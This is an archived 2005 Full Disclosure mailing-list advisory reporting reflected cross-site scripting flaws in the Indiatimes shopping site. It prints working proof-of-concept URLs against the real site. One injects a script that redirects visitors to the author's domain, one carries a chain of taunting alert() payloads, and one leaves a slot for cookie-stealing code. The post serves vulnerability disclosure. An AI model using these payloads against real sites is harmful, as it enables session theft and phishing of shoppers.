Full Disclosure mailing list archives
Indiatimes Shopping Cart XSS (Cross Site Scripting) Attacks
From: "Debasis Mohanty" <mail () hackingspirits com>
Date: Sat, 30 Jul 2005 02:48:49 +0530
Recently, I discovered a major XSS issue with Indiatimes shopping cart. It is one of the largest shopping and auctioning portal in India. The XSS flaw is present in most of the links of the portal however, I am currently reporting only few specific links which are very critical. The vulnerability details are provided below - Vulnerability: Indiatimes Shopping Cart XSS (Cross Site Scripting) Attacks Criticality: High Description: Indiatimes Shopping Cart (http://store.indiatimes.com) can be exploited by any malicious user to conduct cross-site scripting and script insertion attacks. The Input passed to certain parameters in various scripts isn't properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML or script code in a user's browser session in context of an affected site by tricking the user into visiting a malicious website or follow a specially crafted link. Below is the proof-of-concept which explains this - 1. Retrieving Cookies or Executing Malicious Commands Remotely http://store.indiatimes.com/book/PlanetMBookSearch.jsp?keyword=[MALCODE HERE]&search=title&image.x=5&image.y=14 2. Re-directing the site to any malicious or fake site to trap the victim http://store.indiatimes.com/book/PlanetMBookSearch.jsp?keyword=<script>docum ent.location.replace('http://www.hackingspirits.com')</script>&search=title& image.x=5&image.y=14 This can be of great aid to the phishers who can entice the user to click on the above link and get re-directed to some malicious sites where their critical informations can be stolen. 2. Something more annoying http://shopping.indiatimes.com/webapp/commerce/command/ExecMacro/Indiatimes_ Shop/macros/singlemacrosnew/Product.d2w/report?prmenbr=195102&prrfnbr=871074 &parentcat=753736&product_rn=<script>alert('T00%20BAD')</script>&product_rn= <script>alert('I%20AM%20HERE')</script>&product_rn=<script>alert('YEAH%20YOU %20FOOL')</script>&product_rn=<script>alert('HAVE%20YOU%20LOST%20YOUR%20BRAI N')</script>&product_rn=<script>alert('HE%20HE%20HE%20!!!')</script>&product _rn=<script>alert('DO%20A%20FAVOUR%20!!%20GO%20UNPLUG%20UR%20PC%20CABLE')</s cript>&product_rn=<script>alert('OR%20REBOOT%20IT')</script>&product_rn=<scr ipt>alert('LOOSER%20!!')</script> History: Vendor has been notified but there is no response and I guess neither they are going to respond. Cheers, Debasis Mohanty www.hackingspirits.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Indiatimes Shopping Cart XSS (Cross Site Scripting) Attacks Debasis Mohanty (Jul 29)